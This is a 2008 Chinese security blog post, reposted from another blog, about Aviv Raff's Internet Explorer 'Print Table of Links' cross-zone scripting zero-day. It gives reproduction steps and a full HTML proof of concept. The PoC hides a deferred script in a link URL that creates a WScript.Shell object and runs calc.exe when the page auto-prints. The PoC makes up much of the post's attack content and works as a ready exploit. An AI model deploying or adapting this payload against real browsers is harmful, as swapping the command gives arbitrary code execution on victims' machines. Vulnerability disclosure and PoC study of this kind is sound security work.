夜火 & 轨迹's Blog

免费网络资源-网络新闻-计算机技术-网络安全-计算机病毒—15897.com(要我发就齐) 夜火&轨迹共用的Blog

导航

2008-5-15 20:47:47

Aviv Raff的IE 0day-MS IE“Print Table of Links”Cross-Zone Scripting Vulnerability

夜火:IE浏览器0day漏洞。。。。。。。。。代码比较简单

MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 

重现:
1.下面这个地方打上勾

2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html
<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(’WScript.Shell’);x.Run(’calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>

这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。

From:Sowhat的blog


« 远程包含和本地包含漏洞的原理 Radmin 3.2 简体中文绿色完美者版本 »

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火&轨迹's Blog [ http://www.15897.com/ ]

本文链接地址: http://www.15897.com/blog/post/Aviv-Raff-IE-0day-Print-Table-of-Links.html

Tags: 0day   浏览器   漏洞信息  
发布:xloong | 分类:漏洞信息 | 评论:0 | 引用:0| RSS订阅 |浏览:

收藏到网摘

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-Blog 1.8 Spirit Build 80722

Copyright © 夜火 & 轨迹's Blog All Rights Reserved.  深圳SEO SMC气动元件    |   Sitemap   |      |